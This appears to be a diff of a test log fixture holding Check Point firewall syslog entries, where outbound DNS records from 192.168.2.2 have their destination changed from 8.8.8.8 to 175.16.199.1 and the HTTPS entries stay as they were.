-<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52663"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60493"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46013"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52663"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60493"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"108.177.119.156"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41750"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47211"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47211"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.19.196"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42974"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33216"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33216"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.19.195"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50944"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42675"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47800"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47070"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38626"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42675"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502709"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502710"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
